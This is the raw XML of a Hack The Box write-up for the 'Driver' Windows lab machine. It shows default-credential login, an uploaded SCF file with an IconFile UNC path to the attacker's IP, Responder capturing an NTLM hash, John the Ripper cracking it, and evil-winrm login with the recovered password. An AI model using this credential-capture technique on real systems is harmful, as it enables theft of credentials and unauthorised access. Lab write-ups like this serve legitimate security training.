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8832" w14:textId="72003A93" w:rsidR="00107855" w:rsidRDefault="00107855"/>
    <w:p w14:paraId="0DD3FFD5" w14:textId="14120E84" w:rsidR="00107855" w:rsidRPr="00107855" w:rsidRDefault="001078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Network Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61628B7E" w14:textId="5449B3CC" w:rsidR="00F36FDD" w:rsidRDefault="007414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HTB Write-up </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC218F" w14:textId="76AEEEB2" w:rsidR="0074149D" w:rsidRPr="0074149D" w:rsidRDefault="0074149D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074149D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Driver box</w:t>
      </w:r>
      <w:r w:rsidR="009C2A72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (windows machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37781F82" w14:textId="3813ADDF" w:rsidR="0074149D" w:rsidRDefault="0074149D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074149D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Difficulty : Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C86D6" w14:textId="32EDB275" w:rsidR="00A803EE" w:rsidRDefault="00A803EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDB10B8" w14:textId="58BFFAAB" w:rsidR="00A803EE" w:rsidRPr="00A803EE" w:rsidRDefault="00A803EE" w:rsidP="00A80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FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49397A" w14:textId="3A628A2F" w:rsidR="0074149D" w:rsidRDefault="00741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to find open port, IP Box : 10.10.11.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4E04B" w14:textId="21978F24" w:rsidR="0074149D" w:rsidRPr="0074149D" w:rsidRDefault="00741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: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10.10.11.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B4321" w14:textId="2A837CEA" w:rsidR="0074149D" w:rsidRDefault="0074149D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36FDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7151CEE1" wp14:editId="115BF4C1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057775" cy="3030220"/>
            <wp:effectExtent l="0" t="0" r="9525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9B17D" w14:textId="77777777" w:rsidR="0074149D" w:rsidRDefault="0074149D"/>
    <w:p w14:paraId="71668A0C" w14:textId="1E849FD5" w:rsidR="001B3096" w:rsidRDefault="001B3096"/>
    <w:p w14:paraId="3FAA6478" w14:textId="25D3D72E" w:rsidR="00F36FDD" w:rsidRPr="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="4AF2CE29" w14:textId="5FDBDB8D" w:rsidR="00F36FDD" w:rsidRPr="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="10829634" w14:textId="7CC90488" w:rsidR="00F36FDD" w:rsidRPr="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="46BFC5B9" w14:textId="46112ED6" w:rsidR="00F36FDD" w:rsidRPr="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="1C3E9F69" w14:textId="2976468E" w:rsidR="00F36FDD" w:rsidRPr="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="397D6D09" w14:textId="1BCCB5A2" w:rsidR="00F36FDD" w:rsidRPr="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="1760C6A5" w14:textId="76B163A8" w:rsidR="00F36FDD" w:rsidRPr="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="0E491B52" w14:textId="25A9D2DC" w:rsidR="00F36FDD" w:rsidRPr="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="685AEAD8" w14:textId="673B0DF2" w:rsidR="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD"/>
    <w:p w14:paraId="5F92E716" w14:textId="4ADB406A" w:rsidR="0074149D" w:rsidRDefault="0074149D" w:rsidP="00F36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port available 80,135 and 445. The service for port 80 is http so we can open it in our browser</w:t>
      </w:r>
      <w:r w:rsidR="00BF7A8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, type the URL 10.10.11.106:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5842FB99" w14:textId="1CBAF54D" w:rsidR="00BF7A8D" w:rsidRDefault="00BF7A8D" w:rsidP="00F36FDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6140D9" w14:textId="6D018F4F" w:rsidR="00BF7A8D" w:rsidRDefault="00BF7A8D" w:rsidP="00F36FDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE3B8AA" w14:textId="0E30526A" w:rsidR="00BF7A8D" w:rsidRDefault="00BF7A8D" w:rsidP="00F36FDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED65B56" w14:textId="307AE03D" w:rsidR="00BF7A8D" w:rsidRDefault="00BF7A8D" w:rsidP="00F36FDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F95082" w14:textId="1B928EF4" w:rsidR="00BF7A8D" w:rsidRDefault="00BF7A8D" w:rsidP="00F36FDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D37C92F" w14:textId="16CF8447" w:rsidR="00BF7A8D" w:rsidRDefault="00BF7A8D" w:rsidP="00F36FDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DCA174" w14:textId="70019351" w:rsidR="009C2A72" w:rsidRDefault="00EA2EE4" w:rsidP="00F36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jump into the website they ask username and password, so I just try something default or basic, the username is “admin” same as the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F63D23" w14:textId="77777777" w:rsidR="009C2A72" w:rsidRPr="00F36FDD" w:rsidRDefault="009C2A72" w:rsidP="009C2A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The website look like this, first thing I try to inspect element to find something or clue that can be useful but I got nothing and it have nothing on the page also so I explore more, see that 3 lines button ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DFE237" w14:textId="3ADA1AD4" w:rsidR="009C2A72" w:rsidRDefault="009C2A72" w:rsidP="00F36FDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36FDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A074D0E" wp14:editId="6C3A18A1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5238750" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21474"/>
                <wp:lineTo x="21521" y="21474"/>
                <wp:lineTo x="21521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2D951" w14:textId="72A4E460" w:rsidR="00F36FDD" w:rsidRDefault="00F36FDD" w:rsidP="00F36FDD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1605"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40374A5C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57CDF1DE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216BE41F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09220BB3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5AC345D1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726C6AC4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3AB167E4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5CF12740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634B0E16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28F6F318" w14:textId="77777777" w:rsidR="009C2A72" w:rsidRDefault="009C2A72" w:rsidP="009C2A72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E238CF" w14:textId="77777777" w:rsidR="009C2A72" w:rsidRPr="00F36FDD" w:rsidRDefault="009C2A72" w:rsidP="009C2A72">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>After a while I found  something interesting, in the update center we can submit a file, this maybe can be a clue. I research up a bit about this kind of attack and found about SCF file, this file can be used for access specific UNC path to build up attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6678D" w14:textId="39290B4E" w:rsidR="00BF7A8D" w:rsidRDefault="009C2A72" w:rsidP="00BF7A8D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4020"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="001624F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1032B9D7" wp14:editId="4B3F7CCC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2021205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight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C1600" w14:textId="0D3BBA79" w:rsidR="00BF7A8D" w:rsidRDefault="00BF7A8D" w:rsidP="00BF7A8D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4020"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476D66FC" w14:textId="4B149FC6" w:rsidR="009C2A72" w:rsidRDefault="009C2A72" w:rsidP="00BF7A8D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4020"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2AF205" w14:textId="77777777" w:rsidR="009C2A72" w:rsidRPr="00672CEA" w:rsidRDefault="009C2A72" w:rsidP="009C2A7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So what we need to do is make a file with format “@[name].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>”, after that put code below to your file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D937830" w14:textId="77777777" w:rsidR="009C2A72" w:rsidRPr="00672CEA" w:rsidRDefault="009C2A72" w:rsidP="009C2A7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[Shell]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D76C97D" w14:textId="77777777" w:rsidR="009C2A72" w:rsidRPr="00672CEA" w:rsidRDefault="009C2A72" w:rsidP="009C2A7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Command=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CAA95" w14:textId="77777777" w:rsidR="009C2A72" w:rsidRPr="00672CEA" w:rsidRDefault="009C2A72" w:rsidP="009C2A7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72CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IconFile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>=\\tun0 IP\share\pentestlab.ico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C8FEBB" w14:textId="77777777" w:rsidR="009C2A72" w:rsidRPr="00672CEA" w:rsidRDefault="009C2A72" w:rsidP="009C2A7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[Taskbar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8E7EA3" w14:textId="44D7EA27" w:rsidR="009C2A72" w:rsidRPr="00672CEA" w:rsidRDefault="00A803EE" w:rsidP="009C2A7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A91C3A2" wp14:editId="50D73F01">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-9525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>443230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="594360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531" y="21213"/>
                <wp:lineTo x="21531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72" w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C2A72" w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ToggleDesktop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E736DCC" w14:textId="7B1A96C2" w:rsidR="009C2A72" w:rsidRDefault="009C2A72" w:rsidP="009C2A72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46168A9C" w14:textId="77777777" w:rsidR="00A803EE" w:rsidRPr="00672CEA" w:rsidRDefault="00A803EE" w:rsidP="009C2A72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45FCEBDC" w14:textId="6BB8F29A" w:rsidR="009C2A72" w:rsidRPr="00672CEA" w:rsidRDefault="00A803EE" w:rsidP="009C2A72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5608B6" wp14:editId="313FE40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822960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21000"/>
                <wp:lineTo x="21531" y="21000"/>
                <wp:lineTo x="2153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A72" w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You can find your tun0 IP with Ifconfig command and scroll down to find tun0 IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B2E68" w14:textId="69D05F81" w:rsidR="00E07A22" w:rsidRDefault="00E07A22" w:rsidP="00E07A2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397CAC6E" w14:textId="77777777" w:rsidR="00A803EE" w:rsidRPr="00672CEA" w:rsidRDefault="00A803EE" w:rsidP="00A803EE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And the .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 xml:space="preserve"> file will look like this, don’t forget to save it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59CEFE" w14:textId="1D47EC00" w:rsidR="001624F9" w:rsidRPr="00672CEA" w:rsidRDefault="002C1547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6679C1" wp14:editId="5A4E823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43600" cy="941705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20974"/>
                <wp:lineTo x="21531" y="20974"/>
                <wp:lineTo x="21531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90BC2" w14:textId="77777777" w:rsidR="00A803EE" w:rsidRDefault="00A803EE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70F06B4F" w14:textId="53DF0FAC" w:rsidR="001624F9" w:rsidRPr="00672CEA" w:rsidRDefault="002C1547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Now, we ready to upload this file to the web, but before that we need a tool that can pick up an event what’s going on in the website, that tool is Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE51CE5" w14:textId="33925383" w:rsidR="001624F9" w:rsidRPr="00672CEA" w:rsidRDefault="001624F9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283AC9C3" w14:textId="77777777" w:rsidR="00A803EE" w:rsidRDefault="00A803EE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64CFA45E" w14:textId="249CA38B" w:rsidR="002C1547" w:rsidRPr="00672CEA" w:rsidRDefault="002C1547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To execute responder you need the following parameter to capture some information (hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130E065" w14:textId="78ADE019" w:rsidR="002C1547" w:rsidRPr="00672CEA" w:rsidRDefault="002C1547" w:rsidP="001624F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Command :Responder -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wrf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 xml:space="preserve"> -v -I tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7135FC72" w14:textId="61EA4052" w:rsidR="005A35A9" w:rsidRPr="00672CEA" w:rsidRDefault="005A35A9" w:rsidP="005A35A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AA233C" wp14:editId="72B27F80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2480310"/>
            <wp:effectExtent l="0" t="0" r="0" b="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83952" w14:textId="15668DEB" w:rsidR="005A35A9" w:rsidRPr="00672CEA" w:rsidRDefault="005A35A9" w:rsidP="005A35A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6F6F374A" w14:textId="77777777" w:rsidR="0031371A" w:rsidRDefault="0031371A" w:rsidP="005A35A9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</w:p>
    <w:p w14:paraId="442F417D" w14:textId="2630C9E2" w:rsidR="005A35A9" w:rsidRPr="00672CEA" w:rsidRDefault="00B4286F" w:rsidP="0031371A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Upload you</w:t>
      </w:r>
      <w:r w:rsidR="0031371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00672CE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 xml:space="preserve"> file to website and see what happen</w:t>
      </w:r>
      <w:r w:rsidR="005A35A9"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EF0F7BE" wp14:editId="6D141502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943600" cy="908685"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21283"/>
                <wp:lineTo x="21531" y="21283"/>
                <wp:lineTo x="21531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A952E" w14:textId="77777777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7593F148" w14:textId="63F02BBB" w:rsidR="00455C0F" w:rsidRPr="00672CEA" w:rsidRDefault="00B4286F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after uploading .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 xml:space="preserve"> file we got NTLM hash, now this can be important so I copied it to the file save it in kali machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A736D6" w14:textId="77777777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2850C66C" w14:textId="77777777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44B9E609" w14:textId="2ABABF3D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59474413" w14:textId="5D1CC344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337BE01F" w14:textId="3251C5A0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06176618" w14:textId="4AB44776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0126622C" w14:textId="77777777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14:paraId="36154220" w14:textId="2EF4DE4A" w:rsidR="00B4286F" w:rsidRPr="00672CEA" w:rsidRDefault="00B4286F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Now, we have a hash that can be decode I notice we have a famous built in crack password hashes, and its John the Ripper,</w:t>
      </w:r>
      <w:r w:rsidR="005A35A9" w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> so</w:t>
      </w:r>
      <w:r w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I use John the Ripper tool to decode the hash</w:t>
      </w:r>
      <w:r w:rsidR="005A35A9" w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03008FFB" w14:textId="22C67B35" w:rsidR="005A35A9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Command : John [your file contain hash]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717C976C" w14:textId="693346B7" w:rsidR="00B4286F" w:rsidRPr="00672CEA" w:rsidRDefault="005A35A9" w:rsidP="00455C0F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A0C4D" wp14:editId="2815D904">
            <wp:extent cx="5934075" cy="2428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707E" w14:textId="5F517A63" w:rsidR="003F7E52" w:rsidRDefault="005A35A9" w:rsidP="003F7E52">
      <w:pPr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We got a result, now we have a credential with username “tony” and the password is “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liltony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>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D12372" w14:textId="77777777" w:rsidR="0031371A" w:rsidRPr="00672CEA" w:rsidRDefault="0031371A" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3D6865" w14:textId="38BDAAE2" w:rsidR="00CC75F7" w:rsidRPr="00672CEA" w:rsidRDefault="00CC75F7" w:rsidP="0031371A">
      <w:pPr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Now we need use this credential to login, Evil-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>, is the tool I use for login with that credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420EB9F6" w14:textId="12169742" w:rsidR="00CC75F7" w:rsidRPr="00672CEA" w:rsidRDefault="00CC75F7" w:rsidP="00CC75F7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9FC4B6F" wp14:editId="5E846629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531" y="21163"/>
                <wp:lineTo x="21531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CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>command : evil-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672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -I 10.10.11.106 -u tony -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>liltony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="226C2EBC" w14:textId="467E87CB" w:rsidR="003F7E52" w:rsidRPr="00672CEA" w:rsidRDefault="003F7E52" w:rsidP="003F7E52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14:paraId="42C9CA2B" w14:textId="241E9AB7" w:rsidR="003F7E52" w:rsidRPr="00672CEA" w:rsidRDefault="00CC75F7" w:rsidP="003F7E52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>successfully login as in windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F887EC6" w14:textId="77777777" w:rsidR="00672CEA" w:rsidRPr="00672CEA" w:rsidRDefault="00672CEA" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EAEC2BA" w14:textId="77777777" w:rsidR="00672CEA" w:rsidRPr="00672CEA" w:rsidRDefault="00672CEA" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E77D8B3" w14:textId="77777777" w:rsidR="00672CEA" w:rsidRPr="00672CEA" w:rsidRDefault="00672CEA" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6BD0AF" w14:textId="77777777" w:rsidR="00672CEA" w:rsidRPr="00672CEA" w:rsidRDefault="00672CEA" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9581F2" w14:textId="77777777" w:rsidR="0031371A" w:rsidRDefault="0031371A" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A4B394" w14:textId="45222FED" w:rsidR="003F7E52" w:rsidRPr="00672CEA" w:rsidRDefault="00672CEA" w:rsidP="003F7E52">
      <w:pPr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7F8FF8F" wp14:editId="1EC4087C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>540385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2378710"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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5F7" w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I figure out that we now as a user, we can find the user.txt file, after exploring and changing many director</w:t>
      </w:r>
      <w:r w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ies, I find the user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA1414" w14:textId="63049318" w:rsidR="00672CEA" w:rsidRPr="00672CEA" w:rsidRDefault="00672CEA" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DD6DF4" w14:textId="67B65683" w:rsidR="002872B9" w:rsidRDefault="00672CEA" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00672CEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the file using cat command and we got the </w:t>
      </w:r>
      <w:r w:rsidR="002872B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user flag</w:t>
      </w:r>
    </w:p>
